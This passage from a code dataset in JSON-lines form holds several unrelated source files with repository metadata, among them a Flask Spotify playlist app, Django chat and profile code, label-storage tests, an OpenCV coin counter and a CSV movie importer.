\"OsdfdEdfdI234D\"\napp.config['SESSION_COOKIE_NAME'] = 'Cookie'\n\n\n# TOKENINFO = \"token_info\"\n\n@app.route('/')\ndef login():\n sp_oauth = create_spotify_oauth()\n auth_url = sp_oauth.get_authorize_url()\n # print(auth_url)\n return redirect(auth_url)\n\n\n@app.route('/logout', methods=['GET', 'POST'])\ndef logout():\n for key in list(session.keys()):\n session.pop(key)\n if os.path.exists(\"./.cache\"):\n os.remove(\"./.cache\")\n return redirect('/')\n\n\n@app.route('/authorize')\ndef authorize():\n sp_oauth = create_spotify_oauth()\n session.clear()\n code = request.args.get('code')\n token_info = sp_oauth.get_access_token(code)\n session[\"token_info\"] = token_info\n return redirect(\"/functions\")\n\n\n@app.route('/functions')\ndef spotifyFunctions():\n # Confirm authorization\n session['token_info'], authorized = get_token()\n session.modified = True\n if not authorized:\n return redirect('/')\n sp = spotipy.Spotify(auth=session.get('token_info').get('access_token'))\n songIDs = getLikedSongs(sp, 0)\n songList = []\n for song in songIDs:\n track = sp.track(song)\n songList.append({\"name\": track[\"name\"], \"artist\": 
track[\"artists\"][0][\"name\"]})\n\n # Retrieves user's public owned playlists and *publicly* followed playlists\n playlistsObject = sp.current_user_playlists()\n playlists = []\n followedPlaylists = []\n user = sp.current_user()\n for p in playlistsObject[\"items\"]:\n if p['owner']['id'] == user['id']:\n playlists.append({\"name\": p[\"name\"], \"id\": p[\"id\"]})\n # else:\n followed = sp.playlist(p['id'])\n length = 0\n for track in followed['tracks']['items']:\n length += track['track']['duration_ms'] / 1000 / 60 / 60\n followedPlaylists.append({\"name\": p[\"name\"], \"id\": p[\"id\"], \"length\": round(length, 3)})\n # Just added a way to more easily visualize the structure\n # with open('playlistTest.json', 'w') as f:\n # json.dump(playlistsObject, f)\n return render_template('index.html', songList=songList, playlists=playlists, followedPlaylists=followedPlaylists)\n\n\n@app.route('/addToPlaylist', methods=['POST'])\ndef addToPlaylist():\n # Adds user's 'liked songs' library to a playlist of choice\n sp = spotipy.Spotify(auth=session.get('token_info').get('access_token'))\n playlistID = request.form.get(\"addToPlaylist\")\n songList = getLikedSongs(sp, 0)\n sp.playlist_add_items(playlistID, songList)\n return redirect('/functions')\n\n\n@app.route('/removeFromLiked', methods=['POST'])\ndef removeFromLiked():\n # Clears user's library, but can only do 50 at a time\n sp = spotipy.Spotify(auth=session.get('token_info').get('access_token'))\n songList = getLikedSongs(sp, 50)\n print(len(songList))\n sp.current_user_saved_tracks_delete(songList)\n\n return redirect('/functions')\n\n\n@app.route('/createPartialPlaylist', methods=['POST'])\ndef createPartialPlaylist():\n sp = spotipy.Spotify(auth=session.get('token_info').get('access_token'))\n # Get string playlistID\n playlistID = request.form.get(\"createPartialPlaylist\")\n if not playlistID:\n return redirect('/functions')\n # Get list of song IDs\n playlistTracksObject = sp.playlist_items(playlistID, additional_types=(\"track\",))\n playlistTracks = []\n for track in playlistTracksObject[\"items\"]:\n playlistTracks.append(track['track']['id'])\n # Get string newName\n newName = request.form.get(\"newName\")\n if not newName:\n return redirect('/functions')\n\n # Shuffle will be \"on\" or None\n shuffle = request.form.get(\"shuffleOn\")\n if shuffle:\n shuffledTracks = []\n while len(shuffledTracks) < len(playlistTracks):\n tmp = random.choice(range(len(playlistTracks)))\n if playlistTracks[tmp] not in shuffledTracks:\n shuffledTracks.append(playlistTracks[tmp])\n if len(shuffledTracks) == len(playlistTracks):\n break\n playlistTracks = shuffledTracks\n\n # Get max length, convert to float\n maxLength = request.form.get(\"playlistLength\")\n if not isFloat(maxLength) or float(maxLength) < 0.5:\n return redirect('/functions')\n maxLength = float(maxLength)\n # Shorten playlist by adding songs until hitting max length\n shortPlaylist = []\n totalTime = 0\n for trackID in playlistTracks:\n dur = sp.track(trackID)[\"duration_ms\"] / 1000.0 / 60 / 60\n if totalTime + dur < maxLength:\n shortPlaylist.append(trackID)\n totalTime += dur\n else:\n break\n date = datetime.date.today()\n description = f\"Shortened version of {sp.playlist(playlistID)['name']}, created on {date}\"\n # Create new playlist\n newPlaylist = sp.user_playlist_create(sp.current_user()['id'], name=str(newName), description=description)\n # Add songs\n sp.playlist_add_items(newPlaylist['id'], shortPlaylist)\n return redirect('/functions')\n\n\ndef isFloat(i):\n try:\n 
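        # float() raises ValueError for non-numeric strings; isFloat treats that as False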
float(i)\n except ValueError:\n return False\n return True\n\n\ndef getLikedSongs(sp, mx):\n # Returns list of ids of songs in user's library\n songList = []\n count = 0\n while True:\n offset = count * 50\n count += 1\n curGroup = sp.current_user_saved_tracks(limit=50, offset=offset)['items']\n for idx, item in enumerate(curGroup):\n # val = {item['track']['id']}\n songList.append(item['track']['id'])\n # this can be updated to use the mx value if needed\n if mx != 0:\n break\n if len(curGroup) < 50:\n break\n\n return songList\n\n\n# Checks to see if token is valid and gets a new token if not\ndef get_token():\n token_valid = False\n token_info = session.get(\"token_info\", {})\n\n # Checking if the session already has a token stored\n if not (session.get('token_info', False)):\n token_valid = False\n return token_info, token_valid\n\n # Checking if token has expired\n now = int(time.time())\n is_token_expired = session.get('token_info').get('expires_at') - now < 60\n\n # Refreshing token if it has expired\n if is_token_expired:\n sp_oauth = create_spotify_oauth()\n token_info = sp_oauth.refresh_access_token(session.get('token_info').get('refresh_token'))\n\n token_valid = True\n return token_info, token_valid\n\n\ndef create_spotify_oauth():\n return SpotifyOAuth(\n client_id=likedID,\n client_secret=likedSecret,\n redirect_uri=url_for('authorize', _external=True),\n show_dialog=True,\n scope=\"user-library-read, user-library-modify, playlist-modify-public\")\n","repo_name":"tsennema/spotify","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37712646299","text":"# max entropy rw's\n# trans prob defined in terms of components of eig centrality of node i \n# e_i is i-th component of normalized eigenvector corresponding to max eigenval of A\n\nimport numpy as np\n\ndef max_entropy_rw(A, e, chi):\n    n = len(A)\n    w = np.zeros((n,n))\n    for i in range(n):\n        for j in range(n):\n            w[i,j] = (e[j]/(chi*e[i]))*A[i,j]\n    \n    return w\n","repo_name":"siantist/graph_mining","sub_path":"grakel/method_random_walk/max_entropy_rw.py","file_name":"max_entropy_rw.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42630859553","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n @Time : 2018/8/21 11:03 AM\n @Author : hanxiaocu\n @File : store.py\n\n Logging utility\n\"\"\"\n\nimport os\nimport logging\nimport time\n\n\nclass UtilLogger(object):\n    \"\"\"\n    Logging utility class\n    \"\"\"\n\n    def __init__(self, name, logfile_name=None, level=logging.DEBUG):\n        self.level = level\n        self.logfile_name = logfile_name\n        self.name = name\n        self.logger = logging.getLogger(name)\n        self.logger.setLevel(level)\n        formatter = logging.Formatter(\"%(asctime)s [%(levelname)s] %(name)s - %(message)s\")\n        ch = None\n        if logfile_name is None:\n            ch = logging.StreamHandler()\n        else:\n            logDir = os.path.dirname(logfile_name)\n            if logDir != \"\" and not os.path.exists(logDir):\n                os.mkdir(logDir)\n                pass\n            now = time.localtime()\n            suffix = '.%d%02d%02d' % (now.tm_year, now.tm_mon, now.tm_mday)\n            ch = logging.FileHandler(logfile_name + suffix)\n        ch.setLevel(logging.DEBUG)\n        ch.setFormatter(formatter)\n        self.logger.addHandler(ch)\n\n    def set_level(self, level):\n        if level.lower() == \"debug\":\n            self.logger.setLevel(logging.DEBUG)\n        elif level.lower() == \"info\":\n            self.logger.setLevel(logging.INFO)\n        elif level.lower() == \"warning\":\n            
self.logger.setLevel(logging.WARNING)\n elif level.lower() == \"error\":\n self.logger.setLevel(logging.ERROR)\n\n def debug(self, message):\n self.logger.debug(message)\n\n def info(self, message):\n self.logger.info(message)\n\n def warning(self, message):\n self.logger.warning(message)\n\n def error(self, message):\n self.logger.error(message)\n","repo_name":"SmallBlackBeans/pythonPractice","sub_path":"hello/爬虫/练习/搜狗词库抓取&解析/utils/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33928440461","text":"from typing import List, Union\n\nfrom classes.interfaces import IRepository\nfrom database.mysql.entities import Cabinet, Office, Order, Product, Product_Category\nfrom database.sqlalchemy import get_session\nfrom fastapi import HTTPException, status\n\ndomain_names = Union[Office, Cabinet, Product, Product_Category, Order]\n\n\nclass MysqlRepository(IRepository):\n def __init__(self, cls: domain_names) -> None:\n self.db = get_session()\n self.cls = cls\n\n def get(\n self, limit: int = 5, offset: int = 0, **kwargs\n ) -> Union[\n List[Office],\n List[Cabinet],\n List[Order],\n List[Product],\n List[Product_Category],\n Office,\n Cabinet,\n Order,\n Product,\n Product_Category,\n ]:\n query = self.db.query(self.cls)\n\n if len(kwargs) > 0 and all(\n [getattr(self.cls, k[0], None) for k in kwargs.items()]\n ):\n try:\n for k, v in kwargs.items():\n query = query.filter(self.cls.__getattribute__(self.cls, k) == v)\n except AttributeError:\n return []\n\n return (\n [x.__dict__ for x in query.limit(limit).offset(offset).all()]\n if limit > 1\n else query.limit(limit).offset(offset).first().__dict__\n )\n\n def add(self, elem) -> domain_names:\n try:\n d = self.cls(**elem.__dict__)\n self.db.add(d)\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n self.db.commit()\n\n def update(self, id: str, update_elem: domain_names) -> domain_names:\n elem = self.cls(id=id, **update_elem.__dict__)\n old = self.get(limit=1, offset=0, id=id)\n try:\n self.remove(old)\n self.add(elem)\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n self.db.commit()\n return elem\n\n def remove(self, elem) -> None:\n try:\n self.db.delete(elem)\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n self.db.commit()\n","repo_name":"Skeesh24/omiko-data","sub_path":"app/database/mysql/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25531941716","text":"#!/usr/bin/env python\nimport sys\nimport json\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger()\n\ndata = sys.argv[1:]\nmerged_data = {'data': []}\n\nfor path, tag in zip(data[0::2], data[1::2]):\n with open(path, 'r') as handle:\n ldata = json.load(handle)\n for element in ldata['data']:\n element['tag'] = tag\n merged_data['data'].append(element)\n\njson.dump(merged_data, sys.stdout)\n","repo_name":"lecorguille/cargo-port","sub_path":"bin/merge_apis.py","file_name":"merge_apis.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"4002973258","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image\n\n# Create your 
models here.\nclass Profile(models.Model):\n YEAR_IN_SCHOOL_CHOICES = [\n ('S', 'Scan'),\n ('1', 'Phase 1'),\n ('2', 'Phase 2'),\n ('3', 'Phase 3'),\n ('F', 'Final'),\n]\n user = models.OneToOneField(User,on_delete=models.CASCADE)\n roles=models.CharField(max_length=10,choices=YEAR_IN_SCHOOL_CHOICES,default='S')\n image = models.ImageField(default='default.jpg',upload_to='profile_pics')\n \n def __str__(self):\n return f'{self.user.username} Profile '\n def save(self,*args,**kwargs):\n super().save(*args,**kwargs)\n\n img=Image.open(self.image.path)\n if img.height >300 or img.width >300:\n output_size=(300,300)\n img.thumbnail(output_size)\n img.save(self.image.path)\n","repo_name":"Jalees-Jahanzaib/Production","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74273206774","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom mainapp.models import table\nfrom .models import Conversation\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import ConversationMessageForm\nfrom django.http import JsonResponse\nfrom django.core import serializers\n# Create your views here.\n@login_required\ndef new_conversation(request,user_id):\n    # Get the target user and redirect if they try to message themselves; save the form's message with commit=False so the foreign key fields can be filled in before the db write\n    user = get_object_or_404(User,id=user_id)\n\n    if user == request.user:\n        return redirect(\"profile\",request.user.id)\n#    conversations = Conversation.objects.filter(members__in=[request.user,user])\n\n#    if conversations:\n#        return redirect(\"conversation:detail\",pk=conversations.first().id)\n    \n    if request.method == \"POST\":\n        form = ConversationMessageForm(request.POST)\n        if form.is_valid():\n            conversation = Conversation.objects.create()\n            conversation.members.add(request.user)\n            conversation.members.add(user)\n            conversation.save()\n            conversation_message = form.save(commit=False)\n            conversation_message.conversation = conversation\n            conversation_message.created_by = request.user\n            conversation_message.save()\n            last_chat =Conversation.objects.filter(members__in=[request.user.id]).order_by(\"-id\").first()\n            return redirect('conversation:detail',last_chat.id)\n    else:\n        form = ConversationMessageForm()\n    \n    return render(request,'new.html',{\n        'form':form\n    })\n@login_required\n# list of conversations\ndef inbox(request):\n    from mainapp.models import Profile\n    get_Profile = Profile.objects.get(user=request.user)\n    get_Profile.in_queue = False\n    get_Profile.save()\n    conversations = Conversation.objects.filter(members__in=[request.user.id])\n    \n    return render(request,'inbox.html',{\n        'conversations':conversations\n    })\n\n@login_required\n# show the conversation's messages and save a new message submitted through the form\ndef detail(request,pk):\n    conversation = Conversation.objects.filter(members__in=[request.user.id]).get(pk=pk)\n    \n    \n    \n    if request.method =='POST':\n        form = ConversationMessageForm(request.POST)\n        if form.is_valid():\n            conversation_message = form.save(commit=False)\n            conversation_message.conversation = conversation\n            conversation_message.created_by = request.user\n            conversation_message.save()\n\n            conversation.save()\n    \n            return redirect('conversation:detail',pk=pk)\n    else:\n        \n        form = ConversationMessageForm()\n    \n\n    return render(request,'detail_converse.html',{\n        
'conversation':conversation,\n 'form':form\n })\ndef detail_ajax(request,conversation_id):\n conversation = Conversation.objects.get(id=conversation_id)\n conv = conversation.messages.all()\n conv_seri = serializers.serialize(\"json\",conv)\n return JsonResponse(conv_seri,safe=False)\n\n","repo_name":"Nicheye/leng_open_source","sub_path":"conversation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1424183146","text":"import unittest\nfrom datastorage.labelstorage import *\n\n\nclass TestLabels(unittest.TestCase):\n\n    l = LabelManager('test_project')\n\n    def setUp(self):\n        self.l.create_tables()\n\n    def tearDown(self):\n        self.l._cur.execute('DROP TABLE labelType')\n        self.l._cur.execute('DROP TABLE labelData')\n        self.l._cur.execute('DROP TABLE fileMapping')\n\n    def test_add_del_label_type(self):\n        self.l.add_label_type('label1', \"red\", 'This is a test label')  # add new label type with name 'label1'\n        self.assertNotEqual(0, len(self.l.get_label_types()))  # new label type should be in the table\n        self.l.add_label(datetime.now(), datetime.now(), 'label1', 'sensor1')  # create a label with the new type\n        self.l.delete_label_type('label1')\n        self.assertEqual(0, len(\n            self.l._cur.execute('SELECT * FROM labelType').fetchall()))  # label type should not be in the table\n        self.assertEqual(0, len(\n            self.l._cur.execute('SELECT * FROM labelData').fetchall()))  # label should not be in the table\n\n    def test_add_del_label(self):\n        label_time = datetime.now()\n        self.l.add_label(label_time, label_time, 'label1', 'sensor1')  # add new label at the current time to sensor 'sensor1'\n        self.assertNotEqual(0, len(self.l.get_all_labels('sensor1')))  # new label should be in the table\n        self.assertNotEqual(0, len(self.l.get_labels_date('sensor1', label_time.date())))\n        self.assertNotEqual(0, len(self.l.get_labels_between_dates('sensor1', label_time, label_time)))\n        self.l.delete_label(label_time, 'sensor1')\n        self.assertEqual(0, len(self.l.get_all_labels('sensor1')))  # label should not be in the table\n        self.assertEqual(0, len(self.l.get_labels_date('sensor1', label_time.date())))\n        self.assertEqual(0, len(self.l.get_labels_between_dates('sensor1', label_time, label_time)))\n\n    def test_update_label_type(self):\n        label_time = datetime.now()\n        self.l.add_label_type('label1', \"red\", 'This is a test label')  # add new label type with name 'label1'\n        self.l.add_label(label_time, label_time, 'label1', 'sensor1')  # create a label with the new type\n        self.assertEqual('label1', self.l._cur.execute('SELECT Name FROM labelType')\n                         .fetchone()[0])  # label type name should be 'label1'\n        self.assertEqual(\"red\", self.l._cur.execute('SELECT Color FROM labelType')\n                         .fetchone()[0])  # label type color should be \"red\"\n        self.assertEqual('This is a test label', self.l._cur.execute('SELECT Description FROM labelType')\n                         .fetchone()[0])  # label type description should be 'This is a test label'\n        self.l.update_label_color('label1', \"blue\")\n        self.assertEqual(\"blue\", self.l._cur.execute('SELECT Color FROM labelType')\n                         .fetchone()[0])  # label type color should now be \"blue\"\n        self.l.update_label_description('label1', 'This is a changed description')\n        self.assertEqual('This is a changed description', self.l._cur.execute('SELECT Description FROM labelType')\n                         .fetchone()[0])  # label type description should now be 'This is a changed description'\n        self.l.update_label_name('label1', 'label2')\n        
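        # renaming the label type should also rename labels that were created with it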
self.assertEqual('label2', self.l._cur.execute('SELECT Name FROM labelType')\n .fetchone()[0]) # label type name should now be 'label2'\n self.assertEqual('label2', self.l._cur.execute('SELECT Label_name FROM labelData')\n .fetchone()[0]) # label created with the label type should also be named 'label2' now\n\n def test_file_mapping(self):\n date = datetime.now()\n self.l.add_file('file.txt', 'sensor', date)\n self.assertTrue(self.l.file_is_added('file.txt'))\n self.assertIn('file.txt', self.l.get_file_paths('sensor', date, date))\n self.assertIn('sensor', self.l.get_sensor_ids())\n","repo_name":"Semakon/Pppp_pipeline","sub_path":"test/datastorage/TestLabels.py","file_name":"TestLabels.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24710488346","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\":Mod: __init__\n\n:Synopsis:\n\n:Author:\n servilla\n\n:Created:\n 3/16/18\n\"\"\"\n\nimport logging\nimport os\n\nimport daiquiri\n\ncwd = os.path.dirname(os.path.realpath(__file__))\nlogfile = cwd + '/soh.log'\ndaiquiri.setup(level=logging.WARN,\n outputs=(daiquiri.output.File(logfile), 'stdout',))\nlogger = daiquiri.getLogger('__init__.py: ' + __name__)\n\n\ndef main():\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PASTAplus/soh","sub_path":"src/soh/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33511463565","text":"import pickle\nimport os\n\nhigh_scores_filename = 'high_scores.dat'\n\nscores = []\n\n# first time you run this, \"high_scores.dat\" won't exist\n# so we need to check for its existence before we load\n# our \"database\"\nif os.path.exists(high_scores_filename):\n # \"with\" statements are very handy for opening files.\n with open(high_scores_filename,'rb') as rfp:\n scores = pickle.load(rfp)\n # Notice that there's no \"rfp.close()\"\n # ... 
the \"with\" clause calls close() automatically!\n\nfirst_name = input(\"Please enter your name:\")\nscore = input(\"Please enter your score:\")\n\nhigh_scores = first_name, score\nscores.append(high_scores)\n\n# Now we \"sync\" our database\nwith open(high_scores_filename,'wb') as wfp:\n pickle.dump(scores, wfp)\n\n# Re-load our database\nwith open(high_scores_filename,'rb') as rfp:\n scores = pickle.load(rfp)\n\nprint(scores)","repo_name":"matthewfeliciano/_PythonClass-IT-FDN-100-A","sub_path":"Module07/High_Scores.py","file_name":"High_Scores.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3645205948","text":"import sys\nimport numpy as np\nimport cv2\n\n\n# 입력 이미지 불러오기\nimg_path = 'coin_custom.jpg'\n# 'coins1.jpg' 'coin_custom.jpg'\nsrc = cv2.imread(img_path)\n\nif src is None:\n print('Image open failed!')\n sys.exit()\n\ngray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\ncv2.imshow('gray', gray)\nblr = cv2.GaussianBlur(gray, (0, 0), 1) # 가우스블러 고주파노이즈 제거\ncv2.imshow('gausblr', blr)\n\n# 허프 변환 원 검출\n# 입력영상, HOUGH_GRADIENT or HOUGH_GRADIENT_ALT, 배열크기1, 원의 중심점 최소거리,\n# 임계값1,2 , 검출할 최소최대 반지름1,2)\ncircles = cv2.HoughCircles(blr, cv2.HOUGH_GRADIENT, 1, 50,\n param1=150, param2=40, minRadius=20, maxRadius=80)\n#print(circles)\n\n# 원 검출 결과 및 동전 금액 출력\nsum_of_money = 0\n# 깊은 복사\ndst = src.copy()\nif circles is not None:\n for i in range(circles.shape[1]):\n cx, cy, radius = circles[0][i]\n cv2.circle(dst, (cx, cy), radius, (0, 0, 255), 2, cv2.LINE_AA) # 원그리기\n\n # 동전 영역 부분 영상 추출\n x1 = int(cx - radius)\n y1 = int(cy - radius)\n x2 = int(cx + radius)\n y2 = int(cy + radius)\n radius = int(radius) # 반지름\n #print(\"radius : {}\".format(radius))\n\n crop = dst[y1:y2, x1:x2, :]\n ch, cw = crop.shape[:2]\n\n # 동전 영역에 대한 ROI 마스크 영상 생성\n mask = np.zeros((ch, cw), np.uint8)\n cv2.circle(mask, (cw//2, ch//2), radius, 255, -1)\n #cv2.imshow('mask', mask)\n\n # hue는 1바퀴 0~179\n # 동전 영역 Hue 색 성분을 +40 시프트하고, Hue 평균을 계산\n hsv = cv2.cvtColor(crop, cv2.COLOR_BGR2HSV)\n hue, _, _ = cv2.split(hsv)\n hue_shift = (hue + 40) % 180 # hue +40밝게 쉬프트\n #cv2.imshow('hue_shift',hue_shift)\n mean_of_hue = cv2.mean(hue_shift, mask)[0] # meanStdDev() 평균과 표준편차 계산\n # mean 매개변수\n # src\t결과를 Scalar_ 에 저장할 수 있도록 1~4개의 채널을 가져야 하는 입력 배열입니다 .\n # 평균\t출력 매개변수: 계산된 평균 값.\n # 표준 데브\t출력 매개변수: 계산된 표준 편차.\n # 마스크\t선택적 작업 마스크.\n \n #print(\"mean_of_hue : {}\".format(mean_of_hue))\n\n # hue 반지름\n # 10원 55 53 55.7 56.3\n # 50원 44.8 49.3 51.9,53.6\n # 100원 22.7 34.2 58.9 59.2\n # 500원 63.6 ,56.2 62.5, 62.5\n\n # radius 반지름크기 50이상은 500원, 사이 100,10원은 색상 hue값 구별, 45.5이하는 50원,\n # 색이 hue 평균40이하(흑백동) 40이상(주황10원)\n # radius > 50\n won = 500 # radius 54 hue 56\n if 45.5 < radius < 50: # 100won,10won\n if mean_of_hue < 40:\n won = 100\n else:\n won = 10\n elif radius <= 45.5: # 50won\n won = 50\n sum_of_money += won\n\n cv2.putText(crop, str(won), (20, 50), cv2.FONT_HERSHEY_SIMPLEX,\n 0.75, (255, 0, 0), 2, cv2.LINE_AA)\n\n# sum_of_money 변수에 있는값 글씨 쓰기\ncv2.putText(dst, str(sum_of_money) + ' won', (40, 80),\n cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 2, cv2.LINE_AA)\n\ncv2.imshow('src', src)\ncv2.imshow('dst', dst)\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n","repo_name":"kanghc1230/lane_recognition","sub_path":"coin_count2.py","file_name":"coin_count2.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30233284397","text":"import os\n\nimport 
librosa\nimport numpy as np\nfrom pydub import AudioSegment\nfrom scipy.io import wavfile as wavfile\n\nfrom munging.file_methods import prefix_filename, find_filetype\n\n\ndef convert_wavelength_file(filepath, wavelength, replace=True):\n \"\"\"\n :param filepath: directory of file\n :param wavelength: new wavelength\n :param replace: whether to replace the file or make a file with prefix = new\n :return: prints out when the job is done\n \"\"\"\n\n # since this is a conversion, we have to use librosa's library which is slower than scipy\n if not replace:\n filepath = prefix_filename(filepath, 'new_')\n # check whether it needs to be converted or not using scipy wav, faster load time\n sample_rate, audio_array = wavfile.read(filepath)\n\n if (sample_rate != wavelength) or (audio_array.dtype != np.int16): # if not, then convert\n audio_array, sample_rate = librosa.load(filepath, sr=wavelength)\n maxv = np.iinfo(np.int16).max\n librosa.output.write_wav(filepath, (audio_array * maxv).astype(np.int16), sample_rate)\n print(\"The file\", '\"{}\"'.format(filepath), \"has been converted from\", sample_rate, \"to\", wavelength)\n\n\ndef convert_mp3_to_wav(filepath, replace=False):\n \"\"\"Converts mp3 to wav\"\"\"\n\n if find_filetype(filepath) != 'mp3':\n raise ValueError(\"This file isn't mp3\")\n sound = AudioSegment.from_mp3(filepath)\n # convert mp3 to wav in filepath\n filepath_new = filepath.replace(\"mp3\", \"wav\")\n\n sound.export(filepath_new, format=\"wav\")\n\n if replace:\n # just delete the old mp3 file\n os.remove(filepath)\n","repo_name":"liuyang1123/speech2text","sub_path":"munging/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10035938473","text":"def get_index_for_word(word, index):\n # returns the index entry for a certain word, if it exists\n\n if index.get(word):\n return {i[1]: i[0] for i in index.get(word)}\n else:\n return\n\n\ndef print_index_for_word(word, index):\n # gets the index entry for the word if it exists, and prints the output in a pretty way\n\n result = get_index_for_word(word, index)\n if result:\n base = \"{:>5} | {}\"\n print()\n print(base.format(\"Count\", \"Address\"))\n print(\"-\" * 80)\n for page in result:\n print(base.format(result[page], page))\n print()\n else:\n print(\"No results found in index for {}\".format(word))\n return\n\n\ndef search(search_index, terms):\n # searches the index for pages containing all the search terms, rank by count on page\n\n index_terms = [get_index_for_word(term, search_index) for term in terms]\n search_results = []\n\n # seeing as we want an intersection, if any of them are empty return no results\n for term in index_terms:\n if term is None:\n return\n\n # multiply counts together to get index value, if it's not there multiply by 0 to remove the url\n for url in index_terms[0]:\n multiplier = index_terms[0][url]\n for term in index_terms[1:]:\n multiplier *= term.get(url, 0)\n\n if multiplier:\n search_results.append([url, multiplier])\n\n # if there's no intersection return nothing\n if not search_results:\n return\n\n # sort descending by index number and return\n search_results.sort(key=lambda x: x[1], reverse=True)\n\n return search_results\n\n\ndef print_search_results(index, terms):\n # get search results and print out the urls\n\n results = search(index, terms)\n\n if results:\n print(\"\\nSearch results:\")\n for result in results:\n 
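# each result is a [url, score] pair produced by search(); only the url is printed\n 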
print(\"{}\".format(result[0]))\n print(\"\")\n else:\n print(\"No results for search\")\n","repo_name":"ashleyoldershaw/all-roads-lead-to-rome","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38138632092","text":"from django.core.management.base import BaseCommand\nfrom django.conf import settings\nimport os\nimport csv\n\nfrom apps.movie.models import Movie, Genres, Keywords, Artist, MovieActors\n\n\nclass Command(BaseCommand):\n csv_data = os.path.join(settings.BASE_DIR, 'movie_metadata.csv')\n\n def has_value(self, value):\n if len(value) > 0:\n return value\n else:\n return 0\n\n def handle(self, *args, **kwargs):\n with open(self.csv_data, encoding=\"utf-8\") as csv_file:\n reader = csv.DictReader(csv_file)\n i = 0\n for row in reader:\n i += 1\n\n try:\n m = Movie.objects.get(movie_title=row['movie_title'])\n except Movie.DoesNotExist:\n m = None\n\n if m is None:\n movie = Movie.objects.create(\n movie_title=row['movie_title'],\n color=row['color'],\n num_critic_for_reviews=self.has_value(row['num_critic_for_reviews']),\n duration=self.has_value(row['duration']),\n gross=self.has_value(row['gross']),\n num_voted_users=self.has_value(row['num_voted_users']),\n cast_total_facebook_likes=self.has_value(row['cast_total_facebook_likes']),\n facenumber_in_poster=self.has_value(row['facenumber_in_poster']),\n movie_imdb_link=row['movie_imdb_link'],\n num_user_for_reviews=self.has_value(row['num_user_for_reviews']),\n language=row['language'],\n country=row['country'],\n content_rating=self.has_value(row['content_rating']),\n budget=self.has_value(row['budget']),\n title_year=self.has_value(row['title_year']),\n imdb_score=self.has_value(row['imdb_score']),\n aspect_ratio=self.has_value(row['aspect_ratio']),\n movie_facebook_likes=self.has_value(row['movie_facebook_likes'])\n\n # director_name=row['director_name'],\n # director_facebook_likes=self.has_value(row['director_facebook_likes']),\n # actor_1_name=row['actor_1_name'],\n # actor_1_facebook_likes=self.has_value(row['actor_1_facebook_likes']),\n # actor_2_name=row['actor_2_name'],\n # actor_2_facebook_likes=self.has_value(row['actor_2_facebook_likes']),\n # actor_3_name=row['actor_3_name'],\n # actor_3_facebook_likes=self.has_value(row['actor_3_facebook_likes']),\n\n )\n\n director, created = Artist.objects.get_or_create(\n name=row['director_name'],\n likes=row['director_facebook_likes'],\n role='d'\n )\n movie.director = director\n\n if row['actor_1_name']:\n actor, created = Artist.objects.get_or_create(\n # Important:\n # don't search by role because the Artist can\n # be as a director or an actor in a different movies\n # don't use facebook likes because it is his likes in the Movie ( not total likes )\n name=row['actor_1_name']\n )\n MovieActors.objects.create(\n artist=actor,\n movie=movie,\n likes=row['actor_1_facebook_likes']\n ).save()\n\n if row['actor_2_name']:\n actor, created = Artist.objects.get_or_create(\n name=row['actor_2_name']\n )\n MovieActors.objects.create(\n artist=actor,\n movie=movie,\n likes=row['actor_2_facebook_likes']\n ).save()\n\n if row['actor_3_name']:\n actor, created = Artist.objects.get_or_create(\n name=row['actor_3_name']\n )\n MovieActors.objects.create(\n artist=actor,\n movie=movie,\n likes=row['actor_3_facebook_likes']\n ).save()\n\n genres = row['genres'].split('|')\n for genre in genres:\n if len(genre) > 0:\n item, created = 
